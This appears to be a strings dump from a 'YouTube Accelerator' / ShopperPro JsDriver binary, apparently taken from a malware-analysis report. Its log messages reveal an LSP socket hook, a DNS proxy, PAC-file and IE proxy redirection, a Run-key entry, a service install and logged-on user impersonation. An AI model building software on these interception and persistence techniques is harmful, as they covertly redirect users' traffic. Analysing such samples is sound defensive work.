[CServiceController::Install] ___Error CreateService Failed: %d
[CServiceController::Install] ___Error OpenSCManager Failed: %d
%s -%s -%s
%s\%s
[CServiceController::Install] ___Error GetModuleFileName Failed: %d
[CServiceController::Remove] ___Error OpenService Failed: %d
[CServiceController::Remove] ___Error OpenSCManager Failed: %d
[CServiceController::GetStatus] ___Error QueryServiceStatus Failed: %d
[CServiceController::GetStatus] ___Error OpenService Failed: %d
[CServiceController::GetStatus] ___Error OpenSCManager Failed: %d
[CServiceController::Start] The service %s was started
[CServiceController::Start] ___Error StartService Failed: %d
[CServiceController::Start] ___Error OpenService Failed: %d
[CServiceController::Start] ___Error OpenSCManager Failed: %d
[CServiceController::Start] Going to start the service %s
[CServiceController::Stop] The service %s was stopped
[CServiceController::Stop] ___Error ControlService Failed: %d
[CServiceController::Stop] ___Error OpenService Failed: %d
[CServiceController::Stop] Going to stop the service %s
[CServiceController::Stop] ___Error SetServiceStatus Failed: %d
[CServiceController::GetArgsFromCmd] Exit
[CServiceController::GetArgsFromCmd] m_bSCMCmd = TRUE
[CServiceController::GetArgsFromCmd] Enter
[CServiceController::RunCommand] Args: %s
I[CSettingDlg::LoadEngine] ___Error to Create IHttpEngineConfiguration
[CSettingDlg::OnInitDialog] ___Error to Create IHttpEngineConfiguration
WININET.DLL
Gkernel32.dll
d/d/%d d:d:d::d
[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d
"%s" "%s"
"%s" %s
[CVA_Alert::OnDeserialize] ___Error get m_LandingUrl
[CVA_Alert::OnDeserialize] ___Error get m_URL
[ACCELINFO::OnDeserialize] ___Error get URL
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
zvl=%s&
%s?e=%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
Hcomctl32.dll
Hcomdlg32.dll
Hshell32.dll
accKeyboardShortcut
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
Hf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
%s%s.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
mfcm90u.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
Jf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
J.INI
J.com
DLG_%u
PID%u
les (x86)\YouTube Accelerator\YouTubeAccelerator.exe
Important:
Port:
Contact Our Support
See supported video sites
Join Today!
2.0.5.3
Watch YouTube and other web videos without pauses.
Twitter login
Password:
Enter your username and password for Twitter:
<div class="videoitem"><div class="videoimage"><div border" id="%s"><a href="%s" onmouseover="setBorder('%s','1');" onmouseout="setBorder('%s','0');"><img src="images/video/3.jpg" name="moreimg" width="68" /></a></div></div><div class="videotxt">%s</div>
Communications test failed.JWe believe it might be a Security / Firewall issue.
For additional information, contact our support at:
hXXp://@[email protected]/support/
hXXp://@[email protected]/support/VWe believe the problem might be caused by Karspersky antivirus.
hXXp://@[email protected]/support/
Enter port,Please enter a valid Port number (0 - 65536)UPlease enter a valid Domain name or IP address
(e.g. sample.proxy.com, 192.168.1.100)
@BRAND@ - Settings error!3{lX-X-x-XX-XXXXXX}!Get the premium video experience.!The premium web video experience.6Enjoy HD videos and iTunes purchases without the wait.P@BRAND@ Premium
lets you enjoy HD videos and iTunes downloads without the wait.XPlease Approve @BRAND@ in your Firewall and/or Antivirus to complete the Installation...
@BRAND@ECheck out the video %s from %s I'm watching it smoothly with @[email protected] out the video from %s I'm watching it smoothly with @BRAND@.!You are using %s - Translated by:
@BRAND@ is accelerating...#Restart required to change languageeYou have selected %s as VA's interface language.
@BRAND@ Trial version!The ultimate web video experienceN@BRAND@ lets you enjoy smooth web videos and iTunes download without the wait.
!The ultimate web video experienceN@BRAND@ lets you enjoy smooth web videos and iTunes download without the wait.
Normal video acceleration\Watch smooth web videos with bit rates up to 100 KBps without buffering & interruptions.
HD Video AccelerationNStop waiting while you watch HD web videos with high bit rates above 200 KBps.
Supported Video Sites
Every web video just got better
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
3.3.8.9

jsdrv.exe_3700:




.text
`.rdata
@.data
.rsrc
@.reloc
HTTPt
t.Ph|;
FV<.tN<[tJ<\tF<*tB<|t><^t:<$t6
QSSSSh`
u.PShXw
Tu8%XuJ@Uu
Tu.AUub
<d/d/%d d:d:d::d 0x%X>
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
[SbTracer::RecursiveCreateDirectory] Directory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
[SbTracer::FormatFilePath] Log Path: %s
[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
[SbTracer::FormatFilePath] ___Warning - No Log folder: %s
[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
\StringFileInfo\x\%s
[SbTracer::ReadConfiguration] Trace Max Size: %d
[SbTracer::ReadConfiguration] Trace Time Stamp: %d
[SbTracer::ReadConfiguration] Trace Time Limit: %d
[SbTracer::ReadConfiguration] Trace Backup: %d
[SbTracer::ReadConfiguration] Trace Destination: %d
[SbTracer::ReadConfiguration] Trace Level: %d
[SbTracer::BackupTraceFile] %s
[SbTracer::OpenTraceFile] Done %s
[SbTracer::OpenTraceFile] ___Error: %d, File: %s
[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
Windows CE
Windows 7
Windows Vista
Windows 2003 Server
Windows XP
Windows 2000
Windows NT
Windows Me
Windows 98
Windows 95
[CLoader::DisableDnsController] ___Error Disabling Dns Redirect Controller. LE: %X
[CLoader::ProcessTimeoutEvent] ___Warning: Unsupported event (%d)
[CLoader::AddRef] RefCount: %d
[CLoader::Release] RefCount: %d
[CLoader::UpdateVersionStatus] Status: %d (%d)
[CLoader::UnLoadRedirector] ___Error to Stop the Redirect Controller. LE: %d
[CLoader::GetMode] Engine Mode = %d
- m_ImpersonateDone = %d, m_DoLoadModules = %d m_UIRunning = %d
spCmd
[CLoader::DoStop] ___Error UnLoadMonitor - %X
[CLoader::DoStop] ___Error UnLoadRedirector - %X
[CLoader::DoStop] ___Error UnLoadProxy - %X
[CLoader::Load] Added %d m_nLSPConfChangedEvent
[CLoader::IsToLoadProxyModule] ___Error to Create IHttpEngineConfiguration
[CLoader::IsToLoadProxyModule] FALSE - Partner: %s
[CLoader::IsToLoadProxyModule] OEM: %s, Partner: %s
Monitor.dll
%d.%d.%d.%d
[CLoader::LoadProxy] ___Error: Failed To Create the proxy, CreateProxy: %d
[CLoader::RunLspInstaller] ___Error CreateProcess: %d
[CLoader::RunLspInstaller] CreateProcess: %s
\\.\pipe\VAPIPESERVERENG
[CLoader::RunPartnerCommTest] ___Error to create CommTest process. LE: %d
CommTest.exe
[CLoader::FixLSPStatus] Not going to fix LSP, it has been called %d times
[CLoader::CheckOurLSPStatus] Done.
[CLoader::CheckOurLSPStatus] ___Error CreateProcess: %d
[CLoader::CheckOurLSPStatus] CreateProcess: %s
[CLoader::CheckOurLSPStatus]
EmptyKey
[CLoader::InitCore] ___Warning - failed Open Current User Key - ProductInfo.m_hKeyRoot = ACCELERATOR_GLOBAL_KEY
3.3.9.3
[CLoader::InstallLsp] Done - %s
[CLoader::InstallLsp] Running second LSP installation method - %s
2.exe
[CLoader::SetLastTestSucceeded] InstalledLspVersion: %s
[CLoader::UnInstallLSP] Done - %s
Name: %s
Path: %s
Version: %s
%s_%d_%s.log
[CLoader::LoadModules] Already loaded, Status = %d, return...
[CLoader::ProcessEvent] ___Warning: Unsupported event (%d)
[CLoader::ProcessEvent] m_nLSPConfChangedEvent - Added %d
[CLoader::ProcessEvent] m_nLSPConfChangedEvent - LSP configuration has changed, event %d
[CLoader::ProcessEvent] m_UninstallLspProcess - GetExitCodeProcess() returned: %d
[CLoader::ProcessEvent] m_nLspKeepAliveProcess - Added %d m_nLSPConfChangedEvent
[CLoader::ProcessEvent] m_nLspKeepAliveProcess - GetExitCodeProcess() returned: %d
[CLoader::ProcessEvent] m_nLspKeepAliveProcess - Check if our LSP installed DONE, event %d
[CLoader::ProcessEvent] m_InstallLspProcess - GetExitCodeProcess returned: %d
[CLoader::ProcessEvent] m_CommTestSucceeded - Added %d m_nLSPConfChangedEvent
%sLow\%s\
%C:\Users\Public\Documents\%s\%s\
%s\%s\%s\
%s\Application Data\%s\%s\
jsdrv.exe
config.xml
[CImpersonateThread::NotifyImpersonateLogon] Time: %d
[CImpersonateThread::NotifyImpersonateLogoff] Time: %d
[CImpersonateThread::ProcessEvent] CreateProcess - CmdLine: %s, AppName: %s, ShowCmd: %d
[CImpersonateThread::CreateProcess] CmdLine: %s, AppName: %s, ShowCmd: %d
[CImpersonateThread::Start ] ___Error SetConsoleCtrlHandler(TRUE), LE: %d
[CImpersonateThread::Start ] ___Error SetConsoleCtrlHandler(FALSE) failed: %d
\\.\pipe\VAPIPESERVERUI
[CBaseProviderProc::WSPAccept] ___Warning m_ProcTable.lpWSPAccept is not initialized, calling WSAAccept
[CBaseProviderProc::WSPAddressToString] ___Warning m_ProcTable.lpWSPAddressToString is not initialized, calling WSAAddressToString
[CBaseProviderProc::WSPAsyncSelect] ___Warning m_ProcTable.WSPAsyncSelect is not initialized, calling WSAAsyncSelect
[CBaseProviderProc::WSPBind] ___Warning m_ProcTable.lpWSPBind is not initialized, calling bind
[CBaseProviderProc::WSPCancelBlockingCall] ___Warning m_ProcTable.lpWSPCancelBlockingCall is not initialized, calling WSACancelBlockingCall
[CBaseProviderProc::WSPCloseSocket] ___Warning m_ProcTable.lpWSPCloseSocket is not initialized, calling closesocket
[CBaseProviderProc::WSPConnect] ___Warning m_ProcTable.lpWSPConnect is not initialized, calling WSAConnect
[CBaseProviderProc::WSPDuplicateSocket] ___Warning m_ProcTable.lpWSPDuplicateSocket is not initialized, calling WSADuplicateSocketW
[CBaseProviderProc::WSPEnumNetworkEvents] ___Warning m_ProcTable.lpWSPEnumNetworkEvents is not initialized, calling WSAEnumNetworkEvents
[CBaseProviderProc::WSPEventSelect] ___Warning m_ProcTable.lpWSPEventSelect is not initialized, calling WSAEventSelect
[CBaseProviderProc::WSPGetOverlappedResult] ___Warning m_ProcTable.lpWSPGetOverlappedResult is not initialized, calling WSAGetOverlappedResult
[CBaseProviderProc::WSPGetPeerName] ___Warning m_ProcTable.lpWSPGetPeerName is not initialized, calling getpeername
[CBaseProviderProc::WSPGetSockName] ___Warning m_ProcTable.lpWSPGetSockName is not initialized, calling getsockname
[CBaseProviderProc::WSPGetSockOpt] ___Warning m_ProcTable.lpWSPGetSockOpt is not initialized, calling getsockopt
[CBaseProviderProc::WSPGetQOSByName] ___Warning m_ProcTable.lpWSPGetQOSByName is not initialized, calling WSAGetQOSByName
[CBaseProviderProc::WSPIoctl] ___Warning m_ProcTable.lpWSPIoctl is not initialized, calling WSAIoctl
[CBaseProviderProc::WSPJoinLeaf] ___Warning m_ProcTable.lpWSPJoinLeaf is not initialized, calling WSAJoinLeaf
[CBaseProviderProc::WSPJoinLeaf]
[CBaseProviderProc::WSPListen] ___Warning m_ProcTable.lpWSPListen is not initialized, calling listen
[CBaseProviderProc::WSPRecv] ___Warning m_ProcTable.lpWSPRecv is not initialized, calling WSARecv
[CBaseProviderProc::WSPRecvDisconnect] ___Warning m_ProcTable.lpWSPRecvDisconnect is not initialized, calling WSARecvDisconnect
[CBaseProviderProc::WSPRecvFrom] ___Warning m_ProcTable.lpWSPRecvFrom is not initialized, calling WSARecvFrom
[CBaseProviderProc::WSPSelect] ___Warning m_ProcTable.lpWSPSelect is not initialized, calling select
[CBaseProviderProc::WSPSend] ___Warning m_ProcTable.lpWSPSend is not initialized, calling WSASend
[CBaseProviderProc::WSPSendDisconnect] ___Warning m_ProcTable.lpWSPSendDisconnect is not initialized, calling WSASendDisconnect
[CBaseProviderProc::WSPSendTo] ___Warning m_ProcTable.lpWSPAddressToString is not initialized, calling WSASendTo
[CBaseProviderProc::WSPSetSockOpt] ___Warning m_ProcTable.lpWSPSetSockOpt is not initialized, calling setsockopt
[CBaseProviderProc::WSPShutdown] ___Warning m_ProcTable.lpWSPShutdown is not initialized, calling shutdown
[CBaseProviderProc::WSPStringToAddress] ___Warning m_ProcTable.lpWSPStringToAddress is not initialized, calling WSAStringToAddress
[CBaseProviderProc::WSPSocket] ___Warning m_ProcTable.lpWSPSocket is not initialized, calling socket
[CBaseProviderProc::WSPSocket] ___Error could not find protocol for af %d, type %d, protocol %d
[CBaseProviderProc::WSPSocket] ___Error not appropriate af %d
[CBaseProviderProc::WSPCleanup] ___Warning m_ProcTable.lpWSPCleanup is not initialized, calling WSACleanup
[CRedirectController::SetPassThrough]
[CRedirectController::GetTestingMode] %d
[CRedirectController::IsModeSupported] ___Error to Create IHttpEngineConfiguration
[CRedirectController::CRedirectController] ___Error to Create IHttpEngineConfiguration
IsOurPacFileExist: %s
[CRedirectController::IsOurPacFileExist] Existing Pac: %s - Applyed Pac: %s
showitunesMsg
DontShowAccelerationNotSupported
lastiTunesMsgTime
ManualProxyPort
[CConfig::IsLastTestingSucceeded] REGISTRY - Status = %d
[CConfig::IsLastTestingSucceeded] XML - Status = %d
[CConfig::SetLastTestingSucceeded] ___Error LastTestingSucceeded = %d (XML)
[CConfig::SetLastTestingSucceeded] LastTestingSucceeded = %d (XML)
[CConfig::IsTestingMode] ___Error TestingMode = %d (XML)
[CConfig::IsTestingMode] TestingMode = %d (XML)
[CConfig::SetTestingMode] ___Error TestingMode = %d (XML)
[CConfig::SetTestingMode] TestingMode = %d (XML)
[CConfig::GetBrandPort] BrandPort = %d
br_port
CConfig::SetCurrentUserKey
ReportCommFailed
[CConfig::SetSendLogFiles] Status = %d
[CConfig::SetSendInstLogFileOnly] Status = %d
[CConfig::GetCurrentUserKey] ___Error spIImpersonateThread == NULL
[CConfig::SetTracerOn] ___Error GetRegistryKeys
[CConfig::UpdateTracerFromReg] ___Error GetRegistryKeys
[CConfig::SetTracer] Status = %d
[CConfig::SetBackup] ___Error GetRegistryKeys
[CConfig::SetBackup] Status = %d
vaproxy.pac
[CConfig::AddToLearningDomainsList] ___Error adding the domain %s to the learning domains list
[CConfig::AddToLearningDomainsList] The domain %s was added to the learning domains list
[CConfig::IsXBoxMode] Status = %d
[CEventsThread::SetTimeoutResolution] From: %d -> To: %d
[CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms
[CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms
[CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d
[CEventsThread::WaitForMultipleEvents] TID=%X
[CEventsThread::CreateNamedEvent] OpenEvent. LE: %d
[CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d
[CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...
[CEventsThread::Start - Leave] TID=%X
[CEventsThread::Start] ___Error - Failed to create thread: %X
[CEventsThread::Stop - Leave] TID=%X
[CEventsThread::Stop - Enter] TID=%X
[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d
[CEventsThread::AlertEvent] ___Error SetEvent failed: %d
[CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d
[CEventsThread::AlertEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d
[CEventsThread::SetGlobalEvent] ___Error Not found Event: %d
[CEventsThread::SetGlobalEvent] Event: %d
[CEventsThread::ResetEvent] ___Error ResetEvent failed: %d
[CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d
[CEventsThread::ResetEvent] ___Error Not found Event: %d
[CEventsThread::ResetEvent] Event: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d
[CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d
[CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d
[CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d
[CEventsThread::RemoveEvent] ___Error Not found Event: %d
[CEventsThread::RemoveEvent] Event: %d
[CEventsThread::WaitEvent] TID=%X
[CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d
[CEventsThread::Cleanup] Closing Handle: %d
[CEventsThread::Work] TID=%X - Exit !!!
[CEventsThread::Work] WAIT_ABANDONED - %d
[CEventsThread::Work] TID=%X
[CEventsThread::AddEvent] ___Warning event handle already exists %d
[CEventsThread::AddEvent] ___Error invalid event handle %d
[CDnsController::SetRedirectFilter] Domain: %s
[CServiceController::ChangeStartType] ___Error ChangeServiceConfig failed: %d
[CServiceController::ChangeStartType] ___Error OpenService: %s, failed: %d
[CServiceController::ChangeStartType] ___Error OpenSCManager failed: %d
[CServiceController::ChangeStartType] Name: %s
[CServiceController::ExecuteServer] Exit
[CServiceController::ExecuteServer] Enter
[CServiceController::ServiceMain] ___Error SetServiceStatus Failed: %d
[CServiceController::ServiceMain] ___Error RegisterServiceCtrlHandler Failed: %d
[CServiceController::UpdateServiceDespatchTable] ___Error Exception StartServiceCtrlDispatcher Failed: %d
[CServiceController::UpdateServiceDespatchTable] ___Error StartServiceCtrlDispatcher Failed: %d
[CServiceController::UpdateServiceDespatchTable] Enter, %s
[CServiceController::Install] ___Error OpenService Failed: %d
[CServiceController::Install] ___Error QueryServiceStatus Failed: %d
[CServiceController::Install] ___Error CreateService Failed: %d
[CServiceController::Install] ___Error OpenSCManager Failed: %d
%s -%s -%s
[CServiceController::Install] ___Error GetModuleFileName Failed: %d
[CServiceController::Remove] ___Error OpenService Failed: %d
[CServiceController::Remove] ___Error OpenSCManager Failed: %d
[CServiceController::GetStatus] ___Error QueryServiceStatus Failed: %d
[CServiceController::GetStatus] ___Error OpenService Failed: %d
[CServiceController::GetStatus] ___Error OpenSCManager Failed: %d
[CServiceController::Start] The service %s was started
[CServiceController::Start] ___Error StartService Failed: %d
[CServiceController::Start] ___Error OpenService Failed: %d
[CServiceController::Start] ___Error OpenSCManager Failed: %d
[CServiceController::Start] Going to start the service %s
[CServiceController::Stop] The service %s was stopped
JsDriverService.exe
[CServiceController::Stop] ___Error ControlService Failed: %d
[CServiceController::Stop] ___Error OpenService Failed: %d
[CServiceController::Stop] Going to stop the service %s
[CServiceController::Stop] ___Error SetServiceStatus Failed: %d
[CServiceController::GetArgsFromCmd] Exit
[CServiceController::GetArgsFromCmd] m_bSCMCmd = TRUE
[CServiceController::GetArgsFromCmd] Enter
[CServiceController::RunCommand] Args: %s
[CMutexLock::Open] ___Error %d, OpenMutex: %s
[CMutexLock::Open] ___Error %d, CreateMutex: %s
[CCommandsQueue::SetAsync (%p)] ___Error CreateEvent(), Error: %d
[CCommandsQueue::CCommandsQueue - (%p)] CreateEvent() - Failed, Error: %d
[CAcceleratorEvents::ReportStatistics]
[CAcceleratorEvents::OnReportNoAccelerationReason] %s
[CSaveWatchUrl::Work] Saving Info...
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
[CLspController::SetRedirectFilter] IP: %u.%u.%u.%u, Mask: %u.%u.%u.%u
[CLspController::SetVersionStatus] VesrionStatus = %d
[CLspController::GetVersionStatus] VesrionStatus = %d
[CLspController::UpdateVersionStatus] Status: %d (%d)
[CLspController::UpdateVersionStatus] New Status: %d
[CLspController::IsToAccelerate] Local ---@@@ IP: %u.%u.%u.%u, Port: %u @@@, Protocol: %u ---
[CLspController::IsToAccelerate] Global ---@@@ IP: %u.%u.%u.%u, Port: %u @@@, Protocol: %u ---
[CLspController::IsToAccelerate] Partner ---@@@ IP: %u.%u.%u.%u, Port: %u @@@---
[CLspController::IsToAccelerate] iTunes ---@@@ IP: %u.%u.%u.%u, Port: %u @@@---
[CLspController::IsToAccelerate] returns FALSE - status passthrough
[CLspController::IsToAccelerate] returns FALSE - g_PassThrough exists
[CLspController::IsToAccelerate] IP: %u.%u.%u.%u, Port: %u
[CLspController::StartAccelerationsEvent] ___Error OSSetEvent failed: %d
[CLspController::InitTunnelingState] g_PassThrough[ %s ] = %d
[CLspController::IsPartner] partner = %d
[CLspController::UpdateXMLRulesVersion] Version: %s (%s)
[CLspController::UpdateXMLRulesVersion] New Version: %s
[CLspController::IsIgnored] ---@@@ Port: %u @@@---
Downloader.exe
RecordingManager.exe
WebKit2WebProcess.exe
firefox.exe
iTunes.exe
[CLspController::DoLoad] Hook status %d
VVV.youtube.com
[CLspController::DoLoad] ___Error CSharedMemory Create() Local. LE: %d
[CLspController::SetPassThrough] g_PassThrough[ %s ] = %d
PassThroughState
[CLspController::SetPassThrough] ___Error m_smGlobalAccelerationData is Read-Only
[CLspController::SetPassThrough] ___Error m_smGlobalAccelerationData == NULL
[CLspController::SetPassThrough]
[CLspController::UpdatedPartnerDisableList] PartnerDisableList = %s
[CLspController::CreateSharedMemory] ___Error CSharedMemory CreateCriticalSection: %s. LE: %d
[CLspController::CreateSharedMemory] ___Error CSharedMemory Create: %s. LE: %d
[CLspController::CreateSharedMemory] ___Error CSharedMemory Create() Local. LE: %d
[CLspController::IsDomainExistInRules] Found - Template: %s
[CLspController::IsDomainExistInRules] Domain: %s
[CLspController::AddDnsResponse] Adding IP: %u.%u.%u.%u, Mask: %u.%u.%u.%u, Ports: %u - %u
[CLspController::UpdateRedirectionIps] Adding IP: %u.%u.%u.%u, Mask: %u.%u.%u.%u
[CImpersonate::Impersonate] ImpersonateLoggedOnUser - Error: %d
[CImpersonate::Impersonate] Impersonated: %d
[CImpersonate::Revert] RevertToSelf - Error: %d
[CImpersonate::Revert] Impersonated: %d
[CImpersonate::Cleanup] Impersonated: %d
[CImpersonate::GetUserSID] LookupAccountNameW failed. GetLastError returned: %d
[CImpersonate::GetUserSID] The SID for %s is invalid.
[CImpersonate::GetUserSID] Not Enough Memory: %d
[CImpersonate::SetPrivilege] AdjustTokenPrivileges - Error: %d
[CImpersonate::SetPrivilege] LookupPrivilegeValue - Error: %d
[CImpersonate::OpenCurrentUserDesktop] - The function does not support Windows Vista and Windows 98
[CImpersonate::OpenCurrentUserDesktop] OpenDesktop - Error: %d
[CImpersonate::OpenCurrentUserDesktop] OpenInputDesktop - Error: %d
[CImpersonate::OpenCurrentUserDesktop] SetProcessWindowStation - Error: %d
[CImpersonate::OpenCurrentUserDesktop] OpenWindowStation - Error: %d
[CImpersonate::OpenCurrentUserDesktop] GetProcessWindowStation - Error: %d
[CImpersonate::OpenCurrentUserDesktop] - The function does not support MAC
[CImpersonate::CreateProcessAsCurrentUser] CreateProcessAsUser - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] CreateEnvironmentBlock - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] AddAceToDesktop - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] AddAceToWindowStation - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] GetLogonSID - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] DuplicateTokenEx - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] OpenDesktop - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] SetProcessWindowStation - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] OpenWindowStation - Error: %d
[CImpersonate::CreateProcessAsCurrentUser] GetProcessWindowStation - Error: %d
[CImpersonate::AddAceToWindowStation] SetUserObjectSecurity - Error: %d
[CImpersonate::AddAceToWindowStation] SetSecurityDescriptorDacl - Error: %d
[CImpersonate::AddAceToWindowStation] CopySid - Error: %d
[CImpersonate::AddAceToWindowStation] AddAce - Error: %d
[CImpersonate::AddAceToWindowStation] GetAce - Error: %d
[CImpersonate::AddAceToWindowStation] GetAclInformation - Error: %d
[CImpersonate::AddAceToWindowStation] GetUserObjectSecurity - Error: %d
[CImpersonate::AddAceToDesktop] SetUserObjectSecurity - Error: %d
[CImpersonate::AddAceToDesktop] SetSecurityDescriptorDacl - Error: %d
[CImpersonate::AddAceToDesktop] AddAccessAllowedAce - Error: %d
[CImpersonate::AddAceToDesktop] AddAce - Error: %d
[CImpersonate::AddAceToDesktop] GetAce - Error: %d
[CImpersonate::AddAceToDesktop] GetSecurityDescriptorDacl - Error: %d
[CImpersonate::AddAceToDesktop] GetUserObjectSecurity - Error: %d
[CImpersonate::OpenCurrentUserKey] LoadUserProfile - SUCCESS
[CImpersonate::OpenCurrentUserKey] LoadUserProfile failed - Error: %d
[CImpersonate::GetLogonUserName] GetLogonUserName - Error: %d
[CImpersonate::OpenCurrentUserKey] RegOpenCurrentUser - Error: %d
[CImpersonate::OpenCurrentUserKey] RegOpenCurrentUser - SUCCESS
[CImpersonate::OpenCurrentUserKey] Impersonated: %d
[CImpersonate::FindLoggedOnUser] Process32First - Error: %d
[CImpersonate::FindLoggedOnUser] OpenProcess - Error: %d
[CImpersonate::FindLoggedOnUser] OpenProcessToken - Error: %d
[CImpersonate::FindLoggedOnUser] CreateToolhelp32Snapshot failed - Error: %d
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
explorer.exe
[CImpersonate::FindLoggedOnUser] Impersonated: %d
[CImpersonate::GetLogonUserName] Name: %s
[CImpersonate::GetLogonUserName] GetUserName - Error: %d
[CVA_Alert::OnDeserialize] ___Error get m_LandingUrl
[CVA_Alert::OnDeserialize] ___Error get m_URL
user32.dll
WININET.DLL
kernel32.dll
d/d/%d d:d:d::d
[CFullController::IsProxySupported] ___Error Create Proxy Controller
[CFullController::IsProxySupported] Create Proxy Controller...
[CFullController::SetPassThrough]
[CFullController::Init] ___Error to Create IHttpEngineConfiguration
[CFullController::Start] ___Error ProxyRes = %d, LspRes = %d
[CFullController::Stop] ___Error ProxyRes = %d, LspRes = %d
[CProxyController::SetVersionStatus] Status: %d -> %d
[CProxyController::GetVersionStatus] Status: %d
[CProxyController::Init] ___Error to Create IHttpEngineConfiguration
[CProxyController::IsAloud] FALSE - There is a pac file: %s
[HttpProxyServer::CreatePacFile] ___Error: ConfigPath::GetPath. LE: %d
[HttpProxyServer::CreatePacFile] ___Error: WriteRedirectRulesToPacFile. LE: %d
[CDriverManager::IoControl] DeviceIoControl failed: %d
[CDriverController::GetRedirectedConnectionInfo] ___Error GET_CONN %d
[CDriverController::GetRedirectedConnectionInfo] Port %d
[CDriverController::SetRedirectInfo] to port %d
[CDriverController::SetRedirectInfo] ___Error REDIRECT_ALL device %d
[CDriverController::SetRedirectInfo] ___Error SET_PORT device %d
[CDriverController::SetRedirectInfo] ___Error INTERFACE_VERSION mismatch R0 %d R3 %d
[CDriverController::SetRedirectInfo] ___Error INTERFACE_VERSION device %d
[CDriverController::SetRedirectInfo] ___Error open device %d
\\.\svd
HttpHandleAll
HttpWorkerBufferLimit
HttpListenPort
HttpListenIP
RtmpListenPort
[ProxySettingsConfiguration::RestoreOriginalSettings] ___Error ApplyIEProxySettings - Wait: %d
[ProxySettingsConfiguration::RestoreOriginalSettings] ___Error ApplyIEProxySettings - ProcessCommand: %d
[ProxySettingsConfiguration::SaveApplied] ___Error RetrieveIEProxySettings - Wait: %d
[ProxySettingsConfiguration::SaveApplied] ___Error RetrieveIEProxySettings - ProcessCommand: %d
[ProxySettingsConfiguration::SaveOriginal] ___Error RetrieveIEProxySettings - Wait: %d
[ProxySettingsConfiguration::SaveOriginal] ___Error RetrieveIEProxySettings - ProcessCommand: %d
[ProxySettingsConfiguration::RetriveExisting] ___Error RetrieveIEProxySettings - Wait: %d
[ProxySettingsConfiguration::RetriveExisting] ___Error RetrieveIEProxySettings - ProcessCommand: %d
[ProxySettingsConfiguration::SetProxyConfigScript] ___Error SetProxyConfigScript - Wait: %d
[ProxySettingsConfiguration::SetProxyConfigScript] ___Error SetProxyConfigScript - ProcessCommand: %d
SOFTWARE\ShopperPro\JsDriver\%s\Original
SOFTWARE\ShopperPro\JsDriver\%s\Current
[CDnsProxyServer::is_in_redirection_rules] Found redirection Rule: %s
[CDnsProxyServer::load_dns_clients] IP: %s
[CDnsProxyServer::get_dns_servers] Dns Servers count: %d
[CDnsProxyServer::get_dns_servers] Dns Server: %s
[CDnsProxyServer::get_dns_servers] ___Error RegEnumKeyEx. LE: %d, Name: %s
[CDnsProxyServer::get_dns_servers] DhcpNameServer: %s
[CDnsProxyServer::get_dns_servers] NameServer: %s
[CDnsProxyServer::get_dns_servers] ___Error RegOpenKeyEx. LE: %d, Name: %s
[CDnsProxyServer::get_dns_servers] ___Error RegQueryInfoKey. LE: %d
[CDnsProxyServer::get_dns_servers] ___Error key: %s
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
[CDnsProxyServer::Start] ___Error CAsyncUdpSocketServer<CDnsProxyServer>::Start. LE: %d
[CDnsProxyServer::Start] Local IP: %d.%d.%d.%d
[CDnsProxyServer::Start] ___Error SafeGetHostByName. LE: %d, Host: %s
[CDnsProxyServer::Start] Host name: %s
[CDnsProxyServer::Start] ___Error gethostname. LE: %d
